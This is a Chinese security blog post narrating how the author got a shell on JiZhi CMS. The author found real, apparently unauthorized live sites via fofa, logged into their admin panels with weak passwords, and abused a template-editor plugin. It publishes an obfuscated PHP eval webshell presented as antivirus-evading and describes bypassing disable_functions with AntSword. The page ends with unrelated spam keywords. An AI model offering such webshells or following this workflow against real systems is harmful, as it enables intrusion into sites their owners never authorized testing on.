<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記某CMS漏洞getshell

    VSole2021-11-04 08:13:44

    記極致CMS漏洞getshell

    今天下午比較空閑,就去搜索一些cms,突然對極致CMS感興趣,而網上已經有一些文章對它進行分析利用,sql注入,xss,后臺修改上傳后綴名前臺getshell等等。

    于是就引起了我的興趣想去測試一下。

    信息收集

    還是因為自己太懶,不想搭建環境,然后就想網上有好多網站啊,隨便找一個去看看。hhh然后去利用fofa去搜索。(不能隨便亂日)

    弱密碼yyds

    搜索了一些網站,我們直接在url后面添加/admin.php,就直接跳到后臺登錄的地方。

    看到后臺?!嗯~,測試了sql無果,想一想萬一有弱密碼呢?試一試也沒有啥。

    然后就測試了弱密碼,你懂的。

    然后成功登錄~ 仿佛就看到了shell就在我面前了。


    因為之前有師傅發過前臺上傳文件getshell了,那我這里就不進行測試了。直接尋找另一個方法getshell。

    和平常的框架一樣,登錄后臺之后就需要去測試功能點,然后我們就一個一個的去測試吧~(這里大概過了有40分鐘 2333~)

    唯一我感覺利用點就存在系統設置中的高級設置,我們可以選擇上傳的后綴名,不過這里是前臺的上傳啊,后臺雖然有上傳點但是一直繞過不了。難受死了,心里又不甘心在前臺上傳getshell,在豈不是很沒有面子(傲嬌)

    這里一直后臺沒有繞過~~~ 2333~

    柳暗花明又一村

    想一想,如果要利用后臺,那肯定是一些功能的問題,那我們就去認真找一下網站功能,找來找去就發現一個上傳點,有點難受了。過了好久,突然想起了后臺有一個擴展管理啊,應該說肯定可以下載一下插件來更加功能的吧。

    然后就憑著感覺和功能去看看那些插件可以利于。發現了一個在線編輯模板的插件

    這里可能是ctfer的自覺吧~因為之前打過的ctf題基本上是可以利于編輯插件進行修改代碼,就可以getshell。話不多說就開始嘗試。先下載了該模塊并進行安裝。

    安裝前我們還是看看安裝說明。萬一錯誤了怎么辦!

    意思就是我們安裝的時候還需要設置密碼,并且該目錄權限比較高,777就讓我看到了shell的希望

    然后就設置密碼登錄密碼。

    成功登錄之后就看到了這個頁面我當時直接嗨了起了(np!!!)

    進入這個頁面,那豈不是可以修改代碼了,嘿嘿嘿~ 那不是shell唾手可得!

    寫shell連蟻劍

    測試了該插件的功能,發現只能修改代碼還不能寫文件,嗯~。那也簡單啊,我們先在已存在的php頁面上寫入一句話,然后蟻劍連接,創建文件寫shell,之后在刪除之前修改的代碼。

    這里分享一個免殺的小馬

    <?php
    $a = $GLOBALS;
    $str = '_POST';
    eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);
    ?>
    

    這里寫入我們的一句話木馬

    然后就是蟻劍去連接啦。看到蟻劍存在了一個綠色東西,長嘆一口氣~(不過如此)

    連接成功居然不能執行???

    心里又難受了一下~~~

    然后去看看到底過濾了那些函數。并且php版本是5.6

    繞disable_functions(沒成功)

    然后直接上蟻劍的插件,然后發現是5.6 并且是windows 嗚嗚嗚 不會 直接告辭~

    雖然沒有成功執行命令,但也是一個getshell的思路。

    啊~煩~。但是滲透人怎么能認輸~

    俗話說得好,拿不下就換一個(需要表哥們可以給一些意見學習一下~)

    進行收集信息

    進行重復上面的操作又獲得一個網站。并且還是通過弱口令獲得~

    弱口令yyds

    getshell執行命令

    這里的步驟和前面一樣,因為有前面的步驟,而這個shell就簡單多了。

    也成功獲得蟻劍連接。

    并且還是不能執行命令,但是看到了linux系統就想,肯定比windows好多了啊。

    于是就開始繞disable_functions,系統信息是這樣的,那直接蟻劍一把梭。

    成功繞過,這不就成功了!!!

    總結

    極致CMS還是存在很多漏洞的。這里小弟只是拋磚引玉而已。

    而寫到這里的時候已經是晚上了,提權的話還是后面文章在說吧。

    簡單的說一下就是該漏洞是主要存在于cms后臺插件的位置,允許用戶修改代碼,而這沒有過濾就造成了巨大的風險。

    漏洞shell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    RCE系統交互條件與受限環境下的利用
    研究人員在TorchServe中發現多個高分漏洞,影響數萬AI 服務器。
    redis弱密碼漏洞利用
    2021-11-25 07:00:19
    redis無認證,或者弱密碼,可以成功連接到redis服務器 反彈shell拿到的權限取決于redis的啟動賬號 操作: 1. Centos7安裝redis客戶端 #yum install redis --查看是否有redis yum 源#yum install epel-release --下載fedora的epel倉庫# yum install redis -
    妨礙數據利用的諸多因素
    今天分享一篇文章,涉及Redis未授權、SSRF漏洞、寬字節注入、JSONP劫持、CORS、CRLF注入等技能,并詳細講述了其原理和漏洞利用等。能夠回連且權限夠的話,寫crontab利用計劃任務執行命令反彈shell?圖片加載與下載:通過URL地址加載或下載圖片?禁用不需要的協議。禁止30x跳轉Java和PHP的SSRF區別PHP支持的協議:
    部分getshell漏洞匯總
    2022-07-20 10:12:45
    即可未授權訪問console后臺,但是權限比較低備注:此處會出現個問題,在復現的環境中直接拼接
    當我們滲透一個網站時發現從網站滲透不進去的時候,就可以查看該網站主機開啟了哪些端口,來從其開啟的端口來進行入侵
    Apache 軟件基金會已發布修復程序以包含一個積極 利用的零日漏洞,該漏洞會影響廣泛使用的基于 Java 的 Apache Log4j 日志庫,該漏洞可被武器化以執行惡意代碼并允許完全接管易受攻擊的系統。
    分析漏洞的本質是為了能讓我們從中學習漏洞挖掘者的思路以及挖掘到新的漏洞,而CodeQL就是一款可以將我們對漏洞的理解快速轉化為可實現的規則并挖掘漏洞的利器。根據網上的傳言Log4j2的RCE漏洞就是作者通過CodeQL挖掘出的。雖然如何挖掘的我們不得而知,但我們現在站在事后的角度再去想想,可以推測一下作者如何通過CodeQL挖掘到漏洞的,并嘗試基于作者的思路挖掘新漏洞
    全球數萬個太陽能光伏發電站所采用的太陽能發電監控系統曝出嚴重漏洞,遠程攻擊者目前正積極利用該漏洞破壞運營或在系統中駐留。研究人員指出,目前超過三分之二的使用Contec設備的光伏電站尚未安裝漏洞CVE-2022-29303的補丁更新。Contec設備的漏洞可能會導致使用它們的光伏電站設施失去對運營的可見性,可能會導致嚴重后果,具體取決于易受攻擊的設備的部署位置。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类